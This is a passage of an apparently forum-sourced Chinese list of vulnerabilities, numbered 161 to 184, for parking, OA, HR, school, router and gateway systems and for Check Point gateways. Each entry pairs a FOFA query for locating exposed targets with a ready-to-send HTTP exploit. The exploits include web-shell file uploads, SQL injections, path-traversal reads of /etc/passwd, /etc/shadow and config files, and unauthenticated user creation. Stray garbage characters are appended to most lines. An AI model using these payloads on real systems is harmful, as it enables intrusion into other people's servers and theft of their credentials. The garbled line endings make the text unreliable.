161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传* o$ o8 f2 N, _+ x
FOFA:body="/KT_Css/qd_defaul.css"
& L5 k; u# J  Z; m- c* X第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
& X/ |: Q! X, A+ NPOST /Webservice.asmx HTTP/1.1% t! u& A4 D2 `8 u" r% n4 g/ k( {8 p
Host: x.x.x.x
# J" ]& \8 p8 {2 }) y) c' [, C  ]) YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
5 m9 ^; M  n& H8 @& QConnection: close8 @! n/ @2 e- F, D% f
Content-Length: 445# U7 X% F, r! a
Content-Type: text/xml' m3 m! i! A1 Q( A4 }$ ^, M2 F
Accept-Encoding: gzip0 k& @9 M: i0 [& K: t2 d  A

$ g4 q! }, z2 c: D) t<?xml version="1.0" encoding="utf-8"?>
' L/ J2 q7 ]4 j6 e0 j) ?<soap:Envelope xmlns:xsi="
* d5 l. Z& B0 U5 I" `$ C4 b; \* Chttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"0 _) y; z- y0 {) H2 C' L
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 R0 N$ P  ^. u<soap:Body>
; B; n( N! t1 d<UploadResume xmlns="http://tempuri.org/">8 F) B( I/ w# |0 d9 @
<ip>1</ip>
: }  @! {8 G4 D1 f2 \3 R: ^1 @<fileName>../../../../dizxdell.aspx</fileName>
/ [0 i6 w( E3 v7 i, v9 j<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
3 ~9 V; C. Z; @* U2 Z8 r  C% |<tag>3</tag>
% V+ z! }" t% F+ s. d& U</UploadResume>
) C) ?, W4 M: a- ^# G* O2 i</soap:Body>
( ~1 ^( x' b+ t5 l* i& w</soap:Envelope>1 g, A* u. ~& u- x9 W; K* d
. \% I" M4 H) P- {* ^. K" V
9 O0 j$ Y' D6 L) b6 S- `8 z
http://x.x.x.x/dizxdell.aspx$ p; F6 A. w# B* z& P, c

/ V9 m3 v/ {; C162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
# Z/ v: c5 y1 v8 f2 wFOFA: app="和丰山海-数字标牌"
; \" x! B' H$ bPOST /QH.aspx HTTP/1.17 a5 n/ Z- Q2 }. y, _
Host: x.x.x.x% @7 ]5 s3 k. \, l2 A/ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
2 F" g/ Z. w) s6 m: J2 tConnection: close' g8 |- C/ A. L  x, o$ s: B2 i( r( Y
Content-Length: 583
% R" L' s* m/ H. Z- PContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey1 n  r( y3 ?& N9 ~
Accept-Encoding: gzip! i! I+ T( n( I2 A+ E

' c# q  B% N! ?; c& z# R% e------WebKitFormBoundaryeegvclmyurlotuey
' g9 |6 P3 X4 v- Z& }Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
" [% p# N( X% s5 \! ^Content-Type: application/octet-stream2 O/ Q1 @2 t9 f" D
6 ^; b' m0 [7 g/ Z' N
<% response.write("ujidwqfuuqjalgkvrpqy") %>4 T& z* u& c% A" n2 W! K
------WebKitFormBoundaryeegvclmyurlotuey) N' ^5 q7 |9 _3 [6 h
Content-Disposition: form-data; name="action"
& o0 e2 S' N6 l
  v! `# B" E) x2 Mupload9 D! x- g- t2 V4 i2 a
------WebKitFormBoundaryeegvclmyurlotuey
' o& y# H' q% Q! V# V6 x) ?Content-Disposition: form-data; name="responderId"
" T- h: @% m  X  D& E! i9 q6 x; f5 g3 b4 o- `, V
ResourceNewResponder# I: B  _1 g# c
------WebKitFormBoundaryeegvclmyurlotuey; H3 @( ]; y, I! \6 i2 B6 }6 C7 }
Content-Disposition: form-data; name="remotePath") I& h* K, C. m
' I* n  \0 ?* T4 G+ Z; V
/opt/resources
6 J6 v$ r: z% K  _" y% J8 a------WebKitFormBoundaryeegvclmyurlotuey--' N  X! R7 U. S# \
6 Z) z; |1 C. X: l  z
* K: B6 a3 x* [9 N
http://x.x.x.x/opt/resources/kjuhitjgk.aspx4 u$ s: ~- S4 f2 Q% c
* {5 \& \7 ?1 H$ q
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
$ G- j/ M- [" h+ qFOFA: icon_hash="-795291075"4 S3 X+ ~8 a& m& \2 G
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
$ H" p" o  Y" CHost: x.x.x.x+ X$ x3 L; U. ]# [$ u7 I" T$ V0 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
6 v$ ]1 S: U: d( t# m% |Connection: close/ F8 G! E6 O$ i$ D/ T" W
Content-Length: 2937 Z3 Y2 ]  B( @# {6 S
Accept: */*
* v# r$ w- K' B  V* l) AAccept-Encoding: gzip, deflate; U- _# t7 Q2 `# {% ~0 ^
Accept-Language: zh-CN,zh;q=0.9: o0 T1 A: n: T
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod7 X: W& M0 W" m5 N  X
" [" Y% |9 c4 N  h: K- X' Y+ n
------iiqvnofupvhdyrcoqyuujyetjvqgocod
0 A7 N8 ~8 u9 c* b0 W1 hContent-Disposition: form-data; name="name"
5 v7 _- ~& {3 J2 y6 C
% `. v" D( g. D! ^' L8 N1.php
4 w4 t. m  a+ r  k' ?------iiqvnofupvhdyrcoqyuujyetjvqgocod1 V- c6 e( Z8 A9 B0 @+ D# H- b6 }4 M
Content-Disposition: form-data; name="upfile"; filename="1.php"
$ F; E+ D% N0 AContent-Type: image/jpeg
9 H' o8 {4 H% [9 o
4 E) E2 Y! A/ k6 L1 Yrvjhvbhwwuooyiioxega- Q8 e* I& ^; `8 k! j
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
4 x4 D- C0 C4 ]. ]$ p
3 ?9 ~' m) D( Q% E0 @- f7 ]+ k) |4 _, `/ {  g. v/ R0 m+ O
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传  o' G+ W. Y$ r# X0 S
FOFA: title="智慧综合管理平台登入"
" x! T: Q+ j$ v+ ~# \POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
- ]4 [. l" z2 p! v' w7 x2 S  sHost: x.x.x.x& g3 y+ ]  v+ d$ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
$ K7 C$ J1 w8 v4 tContent-Length: 288# T. X' h9 I' Z$ ?( j1 V* V
Accept: application/json, text/javascript, */*; q=0.016 w* y  o- j; H  O  f: F) N0 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,' J) x$ X3 s% M9 h8 o7 \
Connection: close
2 ~8 `& {, j2 O) N. |5 r7 W2 wContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* K8 o, _0 i/ S4 DX-Requested-With: XMLHttpRequest
1 D3 s0 x" b- X0 ]Accept-Encoding: gzip
/ i. i0 m. c+ N* M7 E: i" {8 Q& ]' q& s' {0 ~7 i- |
------dqdaieopnozbkapjacdbdthlvtlyl
( P5 f+ C+ e  I6 Z8 z/ v) @; p; y' QContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"! M9 E" R: f8 X2 c/ x
Content-Type: image/jpeg
1 i) H- s/ E9 S
! v8 E" k5 N1 x7 b7 M: [2 \$ U0 u# C5 r<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
- l  a; W+ i# v7 W& a" M6 j  I2 k------dqdaieopnozbkapjacdbdthlvtlyl--
" R4 o: X8 K3 E3 e$ y1 h  y8 {, L; X' S) n
1 C8 F+ S' J+ Y. z
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx( }7 G4 s2 s/ G* ]9 J

/ o5 b1 {4 E/ [) g% T3 d; @. T$ l; i165. OrangeHRM 3.3.3 SQL 注入
/ D" l3 e1 {, m8 ]) CCVE-2024-36428
6 |% p  P' C; Z9 e2 ZFOFA: app="OrangeHRM-产品"+ C4 ]4 P: D- M: v+ ?
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
- F+ C- T" V) X2 X6 ]* q
$ b5 j2 d0 x3 y" J
: _( N6 x8 {' n( i# K166. 中成科信票务管理平台SeatMapHandler SQL注入
6 L2 i, E/ B2 B. |FOFA:body="技术支持:北京中成科信科技发展有限公司"8 z4 r! L- g4 {5 D; ]# R
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
1 Q% Y- ~( y" i0 l% tHost:6 @2 g" c2 e, I1 [+ ]. F  f# O# m
Pragma: no-cache, [9 n% U2 D# s: z* L7 |
Cache-Control: no-cache2 U& a& J; N6 Z- D
Upgrade-Insecure-Requests: 16 ^% S  g1 Y. W, w* c/ }7 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
! v/ k  l7 X1 `2 ~, ~6 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 t% E& p8 ]% F( z, }9 ]Accept-Encoding: gzip, deflate' {  ^$ l8 `: r0 a" {
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
5 t1 b( g3 Q/ `  NCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
5 U2 |, n! m) F. kConnection: close
3 S; t* ?( Q. p( p7 w  l' RContent-Type: application/x-www-form-urlencoded
" j: s& z- a& W( m3 ?1 yContent-Length: 89- S! b% n! v( u% I% Y! E0 w) c* b

/ J  m5 b; ~0 G* b7 Z7 s1 m' rMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
" K( m- R1 Z4 b2 m, O; ^7 s: w3 F7 I

' _" ?2 M, E( L, t0 m8 P+ w167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 Z8 I4 u9 L- m2 NFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"9 U% L6 V) \* G
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1/ ^/ e2 u+ u7 I
Host:/ @3 t, z5 _/ E3 V; T- z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ G& ]) N# s% d! \/ ~; ^  v" T
Content-Type: application/x-www-form-urlencoded) z* Z5 e( H/ p; Y0 A* b/ s3 M$ |
Accept-Encoding: gzip, deflate6 U+ w% f' V- Y% U8 N
Accept: */*# q2 V4 @1 z3 A& C# k  n9 f' \
Connection: keep-alive" o* p6 y: ?: j* n* T

% W& Z6 [1 L3 x# J3 G8 t8 z' E( i8 O  i9 `7 U% ^8 K
168. 宏景EHR OutputCode 任意文件读取: n8 n$ J: W# a& b2 |
FOFA:app="HJSOFT-HCM"
' I& F9 d& a6 K/ bGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
/ R1 @1 v0 G( E. pHost: your-ip# w$ }- ~, S( M6 N0 }5 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
6 T9 y$ y8 _; }( Z% F# SContent-Type: application/x-www-form-urlencoded
+ H8 z6 x3 N1 A, ^9 n. ~Connection: close
9 G( u; s4 S2 D8 u8 q# ^8 Y
( g+ C4 n3 d/ W* w2 b+ F) v0 A$ c! b; M2 f  U

9 y+ p$ l5 {) c: p, U7 e) ^169. 宏景EHR downlawbase SQL注入
$ v7 r( D- {& T+ w/ u) ~# v* pFOFA:app="HJSOFT-HCM"7 e/ C2 d8 H8 C
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.17 o) a4 z0 R9 @3 V0 P
Host: your-ip# C1 i4 Q/ O# q! g( j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: I& r* ^% M+ O7 GAccept: */*1 F! q: e& X- _0 a
Accept-Encoding: gzip, deflate
, I* V0 A5 k1 D" O) KConnection: close
! `7 p' X: y! j
) f6 a; c, z5 j2 g1 p8 M( A) |) [. ]/ J. N" }! p
/ B3 B6 L5 q5 q" Z: \# g% M
170. 宏景EHR DisplayExcelCustomReport 任意文件读取  v  P5 W; c# S; A
FOFA:body="/general/sys/hjaxmanage.js"7 r* J! H+ P$ {- @! ]+ U
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
& e( c  n) S6 K7 f1 oHost: balalanengliang3 K4 Y$ Q. K* h- H' ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: }# h3 I' u. q- e3 K- [$ G5 }Content-Type: application/x-www-form-urlencoded! `. Z0 `8 l9 a- e9 U/ S7 a
1 q% [2 [; P: T; l' P3 ]: E
filename=../webapps/ROOT/WEB-INF/web.xml
; F+ i& S! I! Y' t5 n9 F: g7 [* c! J! S: U* K7 ?0 W$ L9 \
7 d5 u: o$ W4 d0 E/ s
171. 通天星CMSV6车载定位监控平台 SQL注入$ z  \- T8 c3 O* z% R6 S" J. h7 N# G
FOFA:body="/808gps/"
) A* ]7 T; K4 y+ `4 c2 L! ?GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1% E" E. b+ w- K: b4 }5 `2 ^
Host: your-ip
2 U! K8 T: @4 g2 y- M9 y2 E( lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
1 x8 v, y, t5 CAccept: */*
% d# d% G" }* h2 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" Q! G9 x* U6 M5 I+ J# Y
Accept-Encoding: gzip, deflate
  f4 ~6 Q" E6 y% }$ V7 J: {Connection: close0 R3 w3 h% y% }& ?

% e0 K/ Q' a0 w: E2 V) w5 g1 m* b' |/ U$ |. Y
9 Q; \5 C: |6 @$ L
172. DT-高清车牌识别摄像机任意文件读取
- T0 X: O" v! Q  XFOFA:app="DT-高清车牌识别摄像机"
' f( C# p' W! [- l( TGET /../../../../etc/passwd HTTP/1.14 I, J" ~& R3 u# G/ m1 t% l
Host: your-ip
) X+ ^2 b8 _: ^, HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: I1 D/ H& A, L8 UAccept-Encoding: gzip, deflate0 {8 r0 B; \' ?7 B  l; ]* g
Accept: */*3 \/ K  C/ v$ ]1 I
Connection: keep-alive: M& t) X5 m+ Q% Z
+ E/ E0 ^( T! R) t2 p5 R" Y

& T8 }4 j) Z& K- q# n; [; L( i2 s2 |4 z5 J% [) W- K  i
173. Check Point 安全网关任意文件读取& p, }8 H# J2 a# ~0 b3 U: `3 b8 ?
CVE-2024-24919$ a9 h1 [& C2 i6 q3 Q
FOFA:app="Check_Point-SSL-Network-Extender"3 y+ Q' x& z2 t; Z
POST /clients/MyCRL HTTP/1.1
; t" W+ @' S* [! Y1 EHost: your-ip
. x9 |6 b4 \( V/ i5 aContent-Type: application/x-www-form-urlencoded: f/ h8 g* [; x0 M
1 j; x, V0 s6 O5 D/ T
aCSHELL/../../../../../../../etc/shadow( a& w4 h# c1 D6 ]; v
0 A8 O+ V( Z0 w* z9 ]4 d( n

6 i8 c; `' h( k+ o% W/ n8 \7 K3 b: k9 q7 V: `- L
174. 金和OA C6 FileDownLoad.aspx 任意文件读取" i! I+ t  {! F: Q5 f9 K
FOFA:app="金和网络-金和OA", J3 O# X+ w# z- v8 e
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1- x4 \1 @" K0 R- {
Host: your-ip5 D8 ~( }2 n; R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- E" _8 `0 f/ E* I4 M" m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: {' v3 e* ~, k. \- kAccept-Encoding: gzip, deflate, br: o4 D8 ], }# d" z
Accept-Language: zh-CN,zh;q=0.9
0 l! M' y9 h( \. D( WConnection: close; @/ Q6 ^% x7 V1 P" i- x# J

- J( p3 p" n/ V* P/ S; g
& e4 V; w6 C0 s  l/ S% v
% j- R' L0 m1 L. A0 E175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
9 |- ]. A8 w" jFOFA:app="金和网络-金和OA"8 ]7 F- z+ M7 h/ W; \8 k- |
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
' r/ l$ n, |6 U. g7 J/ |Host:. M. P+ i; |; G3 g. ]6 L- Q5 M
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 |; f8 e, o1 e0 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 X% X+ Q5 G$ O- K" }# D, x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( W3 |. v' {0 K. D) ^
Accept-Encoding: gzip, deflate
6 V: I% J& H/ I8 p1 @6 v# TConnection: close* w% `8 a- n2 \5 y4 S  _& w
Upgrade-Insecure-Requests: 10 j: w9 c  _5 I

- H- B! M1 a% |7 j, l1 ~: g" F( J% `) Q
176. 电信网关配置管理系统 rewrite.php 文件上传
5 b6 }: A$ d) H4 m  |FOFA:body="img/login_bg3.png" && body="系统登录"* J+ J1 h  F! M  n( B
POST /manager/teletext/material/rewrite.php HTTP/1.1; z) Z+ F+ C) [) r- U" E
Host: your-ip2 W  M+ g1 D4 P: ~1 h  F4 U: R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.03 z3 [  m2 @0 N% U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
! H9 I5 h1 r+ `% |/ f+ X' iConnection: close$ n8 T6 D% ^" f  d

' _$ X: L+ i2 _------WebKitFormBoundaryOKldnDPT7 A0 M  X5 ~. t' y( t1 s* E% v
Content-Disposition: form-data; name="tmp_name"; filename="test.php": j9 u% [* O9 ~" g( w0 i
Content-Type: image/png: k5 @; w% T6 H+ ~; R4 D

6 @+ v8 y! e% `: v" o" I1 y<?php system("cat /etc/passwd");unlink(__FILE__);?>2 C1 k) b! b2 E# f
------WebKitFormBoundaryOKldnDPT6 @7 W3 y6 Z% ]3 N9 O
Content-Disposition: form-data; name="uploadtime"1 o+ Y4 f6 ^7 A  w' i' c
0 q4 A5 _2 K0 ^. d; f& J
+ G! m& D, l' g+ E; ~2 I
------WebKitFormBoundaryOKldnDPT--3 n1 G7 c6 |/ Q) ?
& a7 c/ {5 d! }3 f& }
; E6 t3 X/ }5 O9 a

4 E7 r8 u, z* U- `7 F177. H3C路由器敏感信息泄露
4 P2 |/ I! n, S/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 [% J1 ~0 c1 C' g9 }$ j6 X
/userLogin.asp/../actionpolicy_status/../M60.cfg- |& U/ d3 ^  f3 q
/userLogin.asp/../actionpolicy_status/../GR8300.cfg& S1 G: t# W# n" e& z
/userLogin.asp/../actionpolicy_status/../GR5200.cfg  W* k. q" y/ m7 y2 F+ \  E
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/ {3 d3 w( z( h% m  \5 f1 C( p/userLogin.asp/../actionpolicy_status/../GR2200.cfg
; f, T1 d5 p8 P2 t/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg/ G1 A; @( Y/ j( [- Y, m
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg0 J$ K$ g( W# ], I4 }
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
( l; T$ n! v6 |0 P) Y& R/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
* Z) E: X% b# E9 s, z7 U7 @$ D4 o/userLogin.asp/../actionpolicy_status/../ER5200.cfg) S* i0 ~! C7 H1 S1 h
/userLogin.asp/../actionpolicy_status/../ER5100.cfg5 F2 @4 N4 `* S: v
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
# [# Y2 P4 M3 b$ B4 u4 E9 m8 q/userLogin.asp/../actionpolicy_status/../ER3260.cfg
: L7 t) x, c% q3 `/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg) Y: l( v. d- w8 e
/userLogin.asp/../actionpolicy_status/../ER3200.cfg5 ^; `$ D+ u$ E0 K1 C
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
: r+ G5 T# E% S# O0 k: n1 t8 f/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
0 d9 N0 w4 t" }, K/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
# J$ f1 c3 j' t0 s" H) S: b/userLogin.asp/../actionpolicy_status/../ER3100.cfg! S) D. Z& B9 q' z- i
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
, d' }% h# m+ F+ O" ~, Q: P
8 p5 W' g4 I* q1 k) ?# J) W9 e; M7 J- d& [, Q0 v% q
178. H3C校园网自助服务系统-flexfileupload-任意文件上传* Z5 o; N7 t7 K5 B: ]; O
FOFA:header="/selfservice"0 l! _" z9 ^6 I8 n/ T
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1( p3 w! `8 S! x5 U! k, ^9 {2 q
Host:
& Q9 n) V$ I- N3 s9 T5 G1 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 [  r2 M( B# D; J# S& Y' d( M$ h
Content-Length: 252
6 S# I/ e+ N4 ^Accept-Encoding: gzip, deflate
$ @1 [; y, i% [( Z) vConnection: close$ s7 d) v0 `9 ~# d1 X$ |5 d
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l7 c' A  ~4 _" I- ^, A! I! i
-----------------aqutkea7vvanpqy3rh2l5 t# q1 w3 q$ O- y
Content-Disposition: form-data; name="12234.txt"; filename="12234"
. e. y8 C8 ~- ]3 R/ SContent-Type: application/octet-stream! ]% f( E! o+ G  L
Content-Length: 2556 B0 i/ F( Y$ P5 N8 t2 ~

' k2 u; }3 O' \* _* K12234  L: A. l- S" A
-----------------aqutkea7vvanpqy3rh2l--
' f. }, k+ I- ~" E8 d1 u3 H
3 d& c) [! p& M$ V% C
3 T* h6 p: S. WGET /imc/primepush/%2e%2e/flex/12234.txt2 h4 b5 Z8 i. a5 U& q) k$ Z

3 x+ J" h6 t( p7 o, M
. b4 W/ S5 i. H- b. ]179. 建文工程管理系统存在任意文件读取# _, m/ R8 y  [5 d7 ^; L
POST /Common/DownLoad2.aspx HTTP/1.1+ c0 p8 t; o4 L6 t
Host: {{Hostname}}; Z. n2 {+ i7 g. x) b& F2 W
Content-Type: application/x-www-form-urlencoded
4 g% c! t+ \5 p" W; U( HUser-Agent: Mozilla/5.0
0 @+ N3 ^7 ?( ^( d# h. }! \  b4 ^
' W3 @0 d' j; U* y9 w" [path=../log4net.config&Name=8 {; P( a  i, p% h

  R2 r5 C3 l* F- I* Z$ }
4 y$ T3 f0 w3 Z# Q180. 帮管客 CRM jiliyu SQL注入# Q. z$ x6 X9 @7 g& Z
FOFA:app="帮管客-CRM"
5 [! @# C% b# N+ |# l; Z, `- cGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.11 U* B: q0 _/ y4 U& V7 M
Host: your-ip
* {% p4 Q  ]; e" Z' VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: m) V# Z  ?0 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" ^. @$ X/ D1 sAccept-Encoding: gzip, deflate$ K8 T% D7 }  O5 ^$ m0 S+ K
Accept-Language: zh-CN,zh;q=0.95 h/ p" J# \, e! k
Connection: close+ x# J6 V& ~( z; I9 O
+ k, w4 C3 `" }6 V. A3 l* P

) q9 y" a' a- A$ E$ ^& z+ {181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入7 v8 I" ]7 l8 j4 O& Q+ A
FOFA:"PDCA/js/_publicCom.js"# ]0 f9 E  d; m/ f8 E
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1* g2 V6 T5 e" i2 v/ a( H9 Q
Host: your-ip
. h% A4 r* a! ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.366 p4 z$ L1 R1 G3 s" ^$ W' w9 }7 z9 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) {- @( c9 n% EAccept-Encoding: gzip, deflate, br; B1 Z4 u" g. p" d. o4 v% |
Accept-Language: zh-CN,zh;q=0.96 Y9 I1 B# n" W6 D
Connection: close
' a, X' l" N& Q8 |3 o: I7 jContent-Type: application/x-www-form-urlencoded
; P/ K2 R" O, n
7 z( y6 e! `: O7 B+ ?
& q( u- J9 }0 |, J# ^action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20( H5 H) L. e( M* ~+ ~3 y
9 ^& p) F  Z/ u: x" G

+ U. a3 p1 y+ B# |182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建  c. @$ T  X0 G3 n% W% R  b
FOFA:"PDCA/js/_publicCom.js"( O5 ]3 \0 I$ X6 |2 W
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1, p, g  A5 w0 b$ Y
Host: your-ip# A; t; `) k, @2 Y" x4 p1 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36& U, y4 D/ I' k- O! j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( g+ s- s# O$ e9 oAccept-Encoding: gzip, deflate, br# z2 b8 H- S. W4 H, C" K+ s
Accept-Language: zh-CN,zh;q=0.9& d: |  _1 q  O- q+ D( n6 R
Connection: close6 B4 [* o( Q( `$ t1 {$ G
Content-Type: application/x-www-form-urlencoded9 w7 ?9 O1 ^* \" Q
3 j  C" A, C% ]: i) M+ {! J
8 i2 D9 ]. L$ N2 S; H- [* [& U
username=test1234&pwd=test1234&savedays=1. A9 D% f7 V. e! p$ D! _

- U  U, H3 A! R
  v: k* S6 e; ~8 g, F183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入6 e" d( t1 ^9 I+ p& W
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
  d3 W  m; }3 V$ ~- wGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.14 s+ H9 H5 }3 U8 h: [; H
Host: your-ip3 p1 t* {9 ^# L! @
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.368 V& V3 C1 l* r2 Z! S# a2 U) g  B9 `$ h
Accept-Charset: utf-8" Z  G: V' s5 y  ]" |+ h3 }
Accept-Encoding: gzip, deflate
9 O( ]5 ]: A& E( [% G0 O6 a3 OConnection: close1 @+ [  \; j4 ]. V
  X+ s* P0 M$ z7 d$ |! g% Z0 t

  E0 B+ J' P1 R184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加& I! E& G3 M' u0 ^7 J6 y# ^' R+ a% K
FOFA:server="SunFull-Webs"
